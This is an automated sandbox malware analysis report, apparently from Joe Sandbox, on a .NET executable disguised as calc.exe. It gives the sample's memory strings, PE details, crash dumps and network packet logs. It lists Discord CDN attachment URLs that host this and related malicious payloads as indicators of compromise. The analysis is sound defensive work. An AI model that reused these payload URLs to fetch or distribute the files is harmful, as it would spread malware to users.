                                                                                                                                                  https://cdn.discordapp.com/acalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                                    https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                                                                                                                                        https://cdn.discordapp.com/attachments/897223707649515602/897228calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                                          https://cdn.discordapp.com/attachments/897223707649515602/89calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                                            https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_ART.tcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
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                                                                                                                                                                https://cdn.discordapp.com/attachments/897223707649515602/8972285953181calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                                                                                                                                                    https://cdn.discordapp.com/attachments/8972237076495calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                                                      https://cdn.discordapp.com/attachmecalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse

                                                                                                                                                                        Contacted IPs

                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                        • 75% < No. of IPs


                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                        cdn.discordapp.comUnited States



                                                                                                                                                                        General Information

                                                                                                                                                                        Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                                        Analysis ID:510683
                                                                                                                                                                        Start date:28.10.2021
                                                                                                                                                                        Start time:04:55:03
                                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                                        Overall analysis duration:0h 5m 51s
                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                        Report type:full
                                                                                                                                                                        Sample file name:calc.exe
                                                                                                                                                                        Cookbook file name:defaultwindowsfilecookbook.jbs
                                                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                        Run name:Without Tracing
                                                                                                                                                                        Number of analysed new started processes analysed:26
                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                        • HCA enabled
                                                                                                                                                                        • EGA enabled
                                                                                                                                                                        • HDC enabled
                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                        EGA Information:Failed
                                                                                                                                                                        HDC Information:
                                                                                                                                                                        • Successful, ratio: 2.1% (good quality ratio 2.1%)
                                                                                                                                                                        • Quality average: 75.7%
                                                                                                                                                                        • Quality standard deviation: 27.6%
                                                                                                                                                                        HCA Information:
                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                        • Number of executed functions: 22
                                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                        • Adjust boot time
                                                                                                                                                                        • Enable AMSI
                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                        Show All
                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                        • Excluded IPs from analysis (whitelisted):,,,,,,,,,
                                                                                                                                                                        • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                                                                                                                                                        • Execution Graph export aborted for target calc.exe, PID 2952 because it is empty
                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.


                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                        04:56:24API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                        Joe Sandbox View / Context


                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        • cdn.discordapp.com/attachments/710557342755848243/876828681815871488/clp.exe
                                                                                                                                                                        Sales-contract-deaho-180521-poweruae.docGet hashmaliciousBrowse
                                                                                                                                                                        • cdn.discordapp.com/attachments/843685789120331799/844316591284944986/poiu.exe
                                                                                                                                                                        PURCHASE ORDER E3007921.EXEGet hashmaliciousBrowse
                                                                                                                                                                        • cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exe
                                                                                                                                                                        Waybill Document 22700456.exeGet hashmaliciousBrowse
                                                                                                                                                                        • cdn.discordapp.com/attachments/809311531652087809/839856358152208434/May_Blessing.exe
                                                                                                                                                                        COMPANY REQUIREMENT.docGet hashmaliciousBrowse
                                                                                                                                                                        • cdn.discordapp.com/attachments/819674896988242004/819677189900861500/harcout.exe
                                                                                                                                                                        Email data form.docGet hashmaliciousBrowse
                                                                                                                                                                        • cdn.discordapp.com/attachments/789279517516365865/789279697203757066/angelx.scr
                                                                                                                                                                        Down Payment.docGet hashmaliciousBrowse
                                                                                                                                                                        • cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
                                                                                                                                                                        Vessel details.docGet hashmaliciousBrowse
                                                                                                                                                                        • cdn.discordapp.com/attachments/780175015496777751/781048233136226304/mocux.exe
                                                                                                                                                                        Teklif Rusya 24 09 2020.docGet hashmaliciousBrowse
                                                                                                                                                                        • cdn.discordapp.com/attachments/733818080668680222/758418625429372978/p2.jpg


                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
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                                                                                                                                                                        xiLz7khg4J.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        e6AynLSw3y.exeGet hashmaliciousBrowse
                                                                                                                                                                        sboPQqfpHN.exeGet hashmaliciousBrowse
                                                                                                                                                                        oytu1F59dV.exeGet hashmaliciousBrowse
                                                                                                                                                                        Early_Access.-3878_20211027.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        Casting Invite.-859403670_20211027.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        Nwszeclpfkywlsrvlpglyrnsilmxebigcs.exeGet hashmaliciousBrowse
                                                                                                                                                                        Hl9GJ6GvUS.exeGet hashmaliciousBrowse
                                                                                                                                                                        TEaKKn2Dkf.exeGet hashmaliciousBrowse
                                                                                                                                                                        Km5KAxQLLV.exeGet hashmaliciousBrowse
                                                                                                                                                                        mJ1frOovsp.exeGet hashmaliciousBrowse
                                                                                                                                                                        IB5eMmKwbD.exeGet hashmaliciousBrowse
                                                                                                                                                                        IDSTATEMENTS.vbsGet hashmaliciousBrowse
                                                                                                                                                                        payment.xlsGet hashmaliciousBrowse
                                                                                                                                                                        r18qGHf6vL.exeGet hashmaliciousBrowse
                                                                                                                                                                        36#U0443.exeGet hashmaliciousBrowse
                                                                                                                                                                        f25d7dae55dc8c848e9fed3f218f886f4ca4412e5b94a.exeGet hashmaliciousBrowse
                                                                                                                                                                        8cc8f28391efb0099a231da1df27d6acc2a9dbfdc11d5.exeGet hashmaliciousBrowse


                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        CLOUDFLARENETUScalc.exeGet hashmaliciousBrowse
                                                                                                                                                                        S54vrlOu0b.exeGet hashmaliciousBrowse
                                                                                                                                                                        SOA.exeGet hashmaliciousBrowse
                                                                                                                                                                        MSG67228.htmlGet hashmaliciousBrowse
                                                                                                                                                                        j1XcBWNHwh.exeGet hashmaliciousBrowse
                                                                                                                                                                        Invoice - INV-112289154.htmlGet hashmaliciousBrowse
                                                                                                                                                                        0001.dllGet hashmaliciousBrowse
                                                                                                                                                                        xiLz7khg4J.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        0001.dllGet hashmaliciousBrowse
                                                                                                                                                                        e6AynLSw3y.exeGet hashmaliciousBrowse
                                                                                                                                                                        invoice_32.dllGet hashmaliciousBrowse
                                                                                                                                                                        Project update-xl32.dllGet hashmaliciousBrowse
                                                                                                                                                                        digital.alarmclock.alarmy.apkGet hashmaliciousBrowse
                                                                                                                                                                        digital.alarmclock.alarmy.apkGet hashmaliciousBrowse
                                                                                                                                                                        0001.dllGet hashmaliciousBrowse
                                                                                                                                                                        e6dff8475541ebddc1f0db47a311eb2c25581b7d5e62a.exeGet hashmaliciousBrowse
                                                                                                                                                                        RYATPPETU.exeGet hashmaliciousBrowse
                                                                                                                                                                        bdumk5V3ry.exeGet hashmaliciousBrowse
                                                                                                                                                                        BBVA-Confirming Facturas Pagadas al Vencimiento.exeGet hashmaliciousBrowse
                                                                                                                                                                        sboPQqfpHN.exeGet hashmaliciousBrowse

                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0ecalc.exeGet hashmaliciousBrowse
                                                                                                                                                                        j1XcBWNHwh.exeGet hashmaliciousBrowse
                                                                                                                                                                        DHL_Shipment_Notification.exeGet hashmaliciousBrowse
                                                                                                                                                                        mxZECDzIFz.exeGet hashmaliciousBrowse
                                                                                                                                                                        RFQ TESDA PROJECT.exeGet hashmaliciousBrowse
                                                                                                                                                                        IB5eMmKwbD.exeGet hashmaliciousBrowse
                                                                                                                                                                        DHL_waybill20212810.exeGet hashmaliciousBrowse
                                                                                                                                                                        r18qGHf6vL.exeGet hashmaliciousBrowse
                                                                                                                                                                        PR-007493 PR-007495.exeGet hashmaliciousBrowse
                                                                                                                                                                        Software updated by Dylox.exeGet hashmaliciousBrowse
                                                                                                                                                                        open this if the doesn't work.exeGet hashmaliciousBrowse
                                                                                                                                                                        hSNPFOpBGX.exeGet hashmaliciousBrowse
                                                                                                                                                                        XoPspkwdql.exeGet hashmaliciousBrowse
                                                                                                                                                                        jamDpbFXfr.exeGet hashmaliciousBrowse
                                                                                                                                                                        SOkQ2u6sxV.exeGet hashmaliciousBrowse
                                                                                                                                                                        PR-007493 PR-007495.exeGet hashmaliciousBrowse
                                                                                                                                                                        INVOICE 003.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                        Genshin Hack v2.0.exeGet hashmaliciousBrowse
                                                                                                                                                                        Fortnite Hack Mod v1.4.exeGet hashmaliciousBrowse
                                                                                                                                                                        Ghost_hack_v4.6.8_winx64.exeGet hashmaliciousBrowse

                                                                                                                                                                        Dropped Files

                                                                                                                                                                        No context

                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                        Entropy (8bit):1.1474137951894232
                                                                                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.!.!.c.a.l.c...
                                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Oct 28 11:56:13 2021, 0x1205a4 type
                                                                                                                                                                        Size (bytes):254011
                                                                                                                                                                        Entropy (8bit):3.814697195905774
                                                                                                                                                                        Preview: MDMP....... ........za............D...............X.......<....&......4"...V..........`.......8...........T...........@R.............. '...........)...................................................................U...........B.......)......GenuineIntelW...........T............za.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................
                                                                                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                        Size (bytes):8364
                                                                                                                                                                        Entropy (8bit):3.691637181662257
                                                                                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.<./.P.i.d.>.......
                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                        Size (bytes):4701
                                                                                                                                                                        Entropy (8bit):4.435584303749706
                                                                                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1229586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                        Size (bytes):1572864
                                                                                                                                                                        Entropy (8bit):4.268369717589601
                                                                                                                                                                        Preview: regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.-".................................................................................................................................................................................................................................................................................................................................................TU&.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):3.8933024346229366
                                                                                                                                                                        Preview: regfP...P...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.-".................................................................................................................................................................................................................................................................................................................................................RU&.HvLE.n......P...........7...3^..q....^...................................... ..hbin................p.\..,..........nk,..{0.........X........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..{0......... ...........P............... .......Z.......................Root........lf......Root....nk ..{0......................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissions
                                                                                                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                        Size (bytes):535
                                                                                                                                                                        Entropy (8bit):4.840369443408386
                                                                                                                                                                        Preview: You must pick another side! This one is full..Proper formatting! GOOD! You can now reset your information...Unhandled Exception: System.Net.WebException: The remote server returned an error: (403) Forbidden... at System.Net.WebClient.DownloadDataInternal(Uri address, WebRequest& request).. at System.Net.WebClient.DownloadData(Uri address).. at System.Net.WebClient.DownloadData(String address).. at DarkEdition.Grogram.reload(String desi).. at DarkEdition.Grogram.assistant().. at DarkEdition.Program.Main(String[] args).

                                                                                                                                                                        Static File Info


                                                                                                                                                                        File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Entropy (8bit):4.465233635365889
                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                        File name:calc.exe
                                                                                                                                                                        File size:192000
                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0&6..........."...0..............:... ...@....@.. .......................@............`................................

                                                                                                                                                                        File Icon

                                                                                                                                                                        Icon Hash:70848a8c8c8ac010

                                                                                                                                                                        Static PE Info


                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                        Subsystem:windows cui
                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                                                                                                        Time Stamp:0xFB362630 [Mon Jul 23 10:32:16 2103 UTC]
                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                        CLR (.Net) Version:v4.0.30319
                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                        File Version Major:4
                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                                                        inc esi
                                                                                                                                                                        jne 00007F8BFC84CEC5h
                                                                                                                                                                        imul ecx, dword ptr [ebp+69h], 63h
                                                                                                                                                                        jc 00007F8BFC84CED1h
                                                                                                                                                                        jnc 00007F8BFC84CED1h
                                                                                                                                                                        je 0000CE94h
                                                                                                                                                                        xor dh, byte ptr [ebx]
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
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                                                                                                                                                                        add byte ptr [eax], al
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                                                                                                                                                                        Data Directories

                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section


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                                                                                                                                                                        Version Infos

                                                                                                                                                                        Translation0x0000 0x04b0
                                                                                                                                                                        LegalCopyrightCopyright 2021
                                                                                                                                                                        Assembly Version15.10.2.1
                                                                                                                                                                        CommentsDK5 Forensics tool and updater

                                                                                                                                                                        Network Behavior

                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                        TCP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Oct 28, 2021 04:56:05.441745996 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.441797018 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.441885948 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.473953962 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.473983049 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.521450996 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.521595955 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.525917053 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.525940895 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.526307106 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.570178032 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.892033100 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.926783085 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.926902056 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.926942110 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.926990032 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.926991940 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927021980 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927047014 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927084923 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927136898 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927143097 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927160978 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927217960 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927225113 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927236080 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927275896 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927290916 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927303076 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927360058 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927403927 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927424908 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927429914 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927440882 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927484035 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927496910 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927509069 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927521944 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927556992 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927568913 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927623034 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927630901 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927644968 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927699089 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927710056 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927758932 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927809000 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927813053 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927823067 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927900076 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927905083 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927916050 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927974939 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927982092 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927993059 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928045988 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928050041 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.928061008 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928113937 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928117037 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.928129911 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928185940 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.928196907 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928244114 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928287983 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928292990 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.928302050 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928354979 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.928365946 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928411007 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928457975 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928459883 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.928472996 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928519011 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928524017 CEST49706443192.168.2.5162.159.135.233
